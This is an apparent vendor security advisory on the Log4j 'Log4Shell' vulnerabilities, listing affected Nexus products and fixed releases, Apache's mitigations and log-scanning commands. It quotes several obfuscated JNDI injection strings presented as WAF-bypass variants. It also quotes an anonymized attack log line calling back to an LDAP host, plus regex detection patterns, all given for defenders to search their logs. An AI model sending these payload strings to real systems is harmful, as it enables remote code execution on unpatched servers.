General information
This article contains information related to the remote code execution (RCE) vulnerability affecting Log4j: https://www.randori.com/blog/cve-2021-44228/
Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers. According to public sources, Chen Zhaojun of Alibaba officially reported a Log4j2 remote code execution (RCE) vulnerability to Apache on Nov. 24, 2021.
This critical vulnerability, subsequently tracked as CVE-2021-44228 (aka “Log4Shell”), impacts all versions of Log4j2 from 2.0-beta9 to 2.14.1.
Further on, two additional CVEs were also reported for Log4j: CVE-2021-45046 for version 2.15, and CVE-2021-45105 for version 2.16.
The Nexus Security team has investigated the impact of the Log4j remote code execution vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) and the possible impact on our products.
Information about the update
Refer to the table in section "Nexus components" for the latest information on the components.
Note |
---|
There was a new vulnerability (CVE-2021-45105) detected in Log4j, which has been fixed in Log4j 2.17. Nexus has investigated the issue, and currently we see no indication that Nexus products are affected by this vulnerability. Customers who still want to update to the latest Log4j version 2.17 can download the corresponding version from the official Log4j website and replace the version 2.16 JAR file with the new one. Nexus will update Log4j again with the next regular release of the corresponding product versions. |
Nexus SaaS customers
If you are a Nexus SaaS (Software as a Service) customer, the mitigation and patching are performed by the SaaS delivery team. At this point in time, we have taken all necessary steps and are awaiting our internal engineering teams to provide a permanent fix. We are monitoring the situation to further analyze any new changes to the CVE and the potential methods of exploiting it, to ensure security and stability in the environment.
Currently, the team is performing a deeper analysis of attack patterns, to be able to tweak our service platform even further for any future adaptations of this vulnerability. Our SaaS services are monitored 24/7/365 by our on-call rotation, and we have also updated our monitoring and routines to deal with this specific CVE.
Releases with fixed versions of the affected components:
- Smart ID version 21.10.2 – This version is packaged with Log4j 2.17.1. You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.2
- Smart ID version 21.10.1 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16. You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.1
- Smart ID version 21.04.7 – This version is packaged with Log4j 2.17.1. You can find this version on the support portal, and release notes here: Release note Smart ID 21.04.7
- Smart ID version 21.04.6 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16. You can find this version on the support portal, and release notes here: Release note Smart ID 21.04.6
- Smart ID version 20.11.3 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16. You can find this version on the support portal, and release notes here: Release note Smart ID 20.11.3
- Digital Access version 6.1.2 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, and it is packaged with Log4j 2.17. You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.2
- Digital Access version 6.1.1 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16. You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.1
- Smart ID Identity Manager (PRIME) version 3.12.14 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16. You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.12.14
- Smart ID Identity Manager (PRIME) version 3.11.5 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16. You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.11.5
- Smart ID Identity Manager (PRIME) version 3.10.30 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16. You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.10.30
Our engineering teams are working hard to develop fixes and to ensure that we provide the best possible fixes for you.
Since Friday evening, 2021-12-10, Nexus has had a dedicated incident team synchronizing our actions after the announcement of the Log4j CVE, to ensure that we work as effectively as possible during the first intensive days after such a critical CVE is released in the wild.
We can see tests and probing being performed on several customers, including our own SaaS environments, but have not yet seen or heard of any case where an attack on our products has actually been successful.
Factors like a WAF (Web Application Firewall) or egress control (a firewall or another method of controlling what traffic is allowed from the inside out) could be mitigating factors in some cases.
Nexus components
This list contains the components from Nexus, and their respective affected versions.
Component | Affected versions | Comment
---|---|---
Smart ID Certificate Manager | None of the supported versions are affected | Does not use Log4j
Nexus OCSP Responder | None of the supported versions are affected | Does not use Log4j
Nexus Timestamp Server | None of the supported versions are affected | Does not use Log4j
Smart ID Desktop / Mobile App | None of the supported versions are affected | Does not use Log4j
Nexus Card SDK | None of the supported versions are affected | Does not use Log4j
Smart ID Physical Access | None of the supported versions are affected | Does not use Log4j
Smart ID Digital Access (previously named Hybrid Access Gateway – HAG) | Versions 6.0.5 and later could be affected if customers have configured Digital Access to use a syslog server for logging. Versions < 6.0.5 are not affected. All versions of HAG are not affected. | When using syslog, Digital Access uses Log4j logging. For all other purposes, an internal logging framework is used; this framework is not affected by CVE-2021-44228. Recommendation is to implement mitigation as described below, or upgrade.
Smart ID Identity Manager / PRIME | EOL WAR versions: 3.5, 3.6. Supported WAR versions: 3.7, 3.8, 3.9, 3.10, 3.11, 3.12. Supported Docker versions: 20.06, 20.11, 21.04, 21.10. | Recommendation is to implement mitigation as described below, until Nexus has provided an official fix
Smart ID Self-Service | Supported WAR versions: 3.9, 20.06 | Recommendation is to implement mitigation as described below, until Nexus has provided an official fix
Smart ID Messaging component - Hermod | None of the supported versions are affected | Hermod is shipped with the Log4j framework, in this case log4j-api, which is not affected. Hermod uses logback for its logging, not Log4j. See reference in documentation: Link and: Link
Note |
---|
If you have made any customized adaptations of your own logging, you need to investigate this with your teams internally. The information in this list is based on how Nexus ships our released versions to you. |
Mitigation
Patch using the latest available version from Nexus, as specified above.
For temporary mitigations, we recommend that you refer to Apache's public documentation for each specific CVE: https://logging.apache.org/log4j/2.x/security.html
Apache advises that if patching is not immediately possible, the following mitigations can be applied. See this page for reference: Apache security page
For CVE-2021-44228: remove the JndiLookup class from the classpath. To do this, enter this command:
Code Block |
---|
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class |
Performing this will prevent the vulnerability from working, as your application server will not perform the callback needed for the vulnerability to be successful.
For CVE-2021-45105: in PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC). In the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application, such as HTTP headers or user input.
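As an added example (not Nexus's or Apache's own code), the following Python script verifies the two workarounds above: it checks whether a log4j-core JAR still contains the JndiLookup class (that is, whether the `zip -d` step has actually been applied), can strip that single entry from a copy of the JAR, and rewrites `${ctx:...}` / `$${ctx:...}` Context Lookups in a PatternLayout string to the `%X{...}` Thread Context Map form. The sample JAR it builds in memory is a constructed stand-in with dummy class bytes; all function names are this example's own.

```python
import io
import re
import sys
import zipfile

# Entry that the Apache workaround removes with `zip -q -d log4j-core-*.jar ...`
JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Matches ${ctx:key} and $${ctx:key}; the key may not contain braces.
CTX_LOOKUP = re.compile(r"\$\$?\{ctx:([^{}]+)\}")


def jar_entries(jar_bytes: bytes) -> list:
    """Return the entry names of a JAR held in memory."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return zf.namelist()


def jar_contains_jndi_lookup(jar_bytes: bytes) -> bool:
    """True if JndiLookup.class is still present, i.e. the workaround is NOT applied."""
    return JNDI_LOOKUP_ENTRY in jar_entries(jar_bytes)


def strip_jndi_lookup(jar_bytes: bytes) -> bytes:
    """Return a copy of the JAR without JndiLookup.class (what `zip -q -d` does on disk)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename == JNDI_LOOKUP_ENTRY:
                continue  # drop only the vulnerable lookup class, keep everything else
            dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def replace_ctx_lookups(pattern: str) -> str:
    """Rewrite Context Lookups in a PatternLayout to Thread Context Map patterns (%X{key})."""
    return CTX_LOOKUP.sub(r"%X{\1}", pattern)


def build_sample_jar() -> bytes:
    """Constructed stand-in for a vulnerable log4j-core JAR (contents are dummies)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        zf.writestr(JNDI_LOOKUP_ENTRY, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def check_jar_file(path: str) -> bool:
    """Report whether a JAR on disk still ships JndiLookup.class."""
    with open(path, "rb") as fh:
        return jar_contains_jndi_lookup(fh.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python check_log4j.py /path/to/log4j-core-2.x.jar [...]
        for jar_path in sys.argv[1:]:
            state = "STILL PRESENT" if check_jar_file(jar_path) else "removed"
            print(f"{jar_path}: JndiLookup.class {state}")
    else:
        sample = build_sample_jar()
        print("before:", jar_contains_jndi_lookup(sample))
        print("after: ", jar_contains_jndi_lookup(strip_jndi_lookup(sample)))
        print(replace_ctx_lookups("%d %p [${ctx:loginId}] $${ctx:sessionId} %m%n"))
```

Run it with one or more JAR paths to audit a deployment after applying the `zip -d` command; run it with no arguments to see the in-memory demonstration. Removing the class only disables the JNDI callback; it does not change the Log4j version reported by the JAR, so keep the upgrade to a fixed Nexus release as the permanent fix.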
Further information
As an additional recommendation, we highly encourage you to investigate all other application servers (non-Nexus software) you might have that could use Log4j.
We also encourage you to perform log analysis of your application and network traffic and to take appropriate steps for mitigation.
This list contains some of the known applications that could be vulnerable to this CVE:
- Apache Struts
- Apache Solr
- Apache Druid
- Apache Flink
- ElasticSearch
- Flume
- Apache Dubbo
- Logstash
- Kafka
- Spring-Boot-starter-log4j2
Log4j RCE exploitation detection
You can use these commands and rules to search for exploitation attempts against the Log4j RCE vulnerability CVE-2021-44228.
Note |
---|
The below commands are examples, and you will need to point the commands to your respective application log folder. |
Note |
---|
Nexus does not have access to the systems hosted by you, the customer (except for Nexus SaaS Services, where this is handled by the service organization), and it is vital that you perform investigations of your own to make sure that you have not been breached and are not subject to any form of data breach. |
Grep / Zgrep
This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:
Code Block |
---|
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log |
This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:
Code Block |
---|
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' |
Grep / Zgrep - Obfuscated variants
These commands also cover the obfuscated variants, but the match output does not include the file name.
This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:
Code Block |
---|
sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \; |
This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:
Code Block |
---|
sudo find /var/log/ -name "*.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \; |
Yara file
YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of VirusTotal and is mainly used in malware research and detection. It was developed with the idea to describe patterns that identify particular strains or entire families of malware.
On this GitHub page, you can find a YARA file that is tailor-made for this CVE (CVE-2021-44228).
Credit for the grep commands and YARA files goes to Neo23x0 / Florian Roth. We share these with you under the Detection Rule License (DRL) 1.1.
WAF bypass methods
Many WAF (Web Application Firewall) vendors and providers have implemented WAF rules to be able to stop the traffic before it can reach the application itself.
There are methods to bypass some of the WAF rules, and these are some examples of methods that we would encourage you to search for in your logs, to see if your WAF might not have caught these requests.
Note: asdasd and xxxxxx are only examples; in a real scenario this would be the attacker's URL.
Code Block |
---|
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc} |
This is an example of how this could look in an application log (real request, anonymized):
Code Block |
---|
2021-12-12 05:54:07 0 ip.number.ip.ip 5f7288ab7f41d805 - - - endpoint.ip.number:443 https - GET / ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://111.111.1111.111:12344/Basic/Command/ Base64/V2Ugd291bGQgbm90IHBvc3QgYW55dGhpbmcgbWFsaWNpb3VzIGhlcmUsIHNvIHRoaXMgaXMganVzdCBh biBleGFtcGxlIHRleHQgY29udmVydGVkIHRvIEJBU0U2NCA6KQ== } host:ip.number.ip.ip:443 404 |
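The grep pipelines above strip `${lower:` and `}` before matching; the obfuscated variants listed in this section can also nest `upper` and `${::-x}` default-value lookups, which that pipeline does not resolve. The following Python scanner is an added example (not Nexus's or Florian Roth's code) that resolves `lower`, `upper` and `:-default` lookups from the inside out, the way Log4j would, before applying the same `jndi:(ldap|ldaps|rmi|dns)` check as the grep commands. The log lines it runs on are constructed for the demonstration (hosts and IPs are placeholders, not real indicators); function names and the `SAMPLE_LOG_LINES` constant are this example's own.

```python
import re
import sys

# Each pattern only matches an innermost lookup (no "${" or "}" inside), so
# nested constructs are resolved from the inside out over several rounds.
LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
# ${name:-default} evaluates to "default"; ${::-j} is the common empty-name form.
DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# Same scheme list as the grep commands in this article.
JNDI = re.compile(r"jndi:(ldaps?|rmi|dns):", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 50) -> str:
    """Collapse lower/upper/default lookups the way Log4j would resolve them."""
    for _ in range(max_rounds):
        resolved = LOWER.sub(lambda m: m.group(1).lower(), text)
        resolved = UPPER.sub(lambda m: m.group(1).upper(), resolved)
        resolved = DEFAULT.sub(r"\1", resolved)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi_probes(lines):
    """Return (line_no, matched_scheme, flattened_line) for lines carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        # Like `tr -d '}'` in the grep variant: drop leftover lookup syntax so
        # `${jNdI:rmi}://host` still reads as jndi:rmi://host.
        flat = re.sub(r"[${}]", "", norm)
        m = JNDI.search(flat)
        if m:
            hits.append((n, m.group(0).lower(), flat))
    return hits


def scan_file(path: str):
    """Scan a plain-text log file; decoding errors are replaced rather than fatal."""
    with open(path, "r", errors="replace") as fh:
        return find_jndi_probes(fh)


# Constructed sample log lines (hosts/IPs are placeholders, not real indicators).
SAMPLE_LOG_LINES = [
    "2021-12-12 05:53:01 GET /index.html HTTP/1.1 200",
    "2021-12-12 05:54:07 GET / ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://192.0.2.10:12344/Basic/Command/Base64/QUJD} 404",
    "2021-12-12 05:55:19 GET /login?user=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://example.invalid/poc} 404",
    "2021-12-12 05:56:40 User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://example.invalid/poc}",
    "2021-12-12 05:57:02 GET /status?ts=${date:yyyy-MM-dd} 200",
]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python find_jndi_probes.py /var/log/app/access.log [...]
        for path in sys.argv[1:]:
            for n, scheme, flat in scan_file(path):
                print(f"{path}:{n}: {scheme} {flat[:120]}")
    else:
        for n, scheme, flat in find_jndi_probes(SAMPLE_LOG_LINES):
            print(f"line {n}: {scheme} -> {flat}")
```

The benign `${date:...}` line and the plain request are not reported; the three probe lines are, including the mixed-case `jNdI` variant that a plain `grep -i jndi:` over raw text would miss. A hit means a lookup string reached the application log, not that the callback succeeded; correlate with outbound LDAP/RMI/DNS connections from the host to judge impact.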
Disclaimer
Nexus has made every effort to make this information accurate and reliable. However, the information, including the recommendations provided by Nexus, is provided "as is" without warranty of any kind. Nexus disclaims all warranties, either expressed or implied, and Nexus shall in no event be liable for any damages whatsoever, including direct, indirect, incidental, consequential, loss of business profits or special damages, which may arise as a result of your use, or inability to use, this information.
Latest update date of this article
2022-02-24 16:50 CET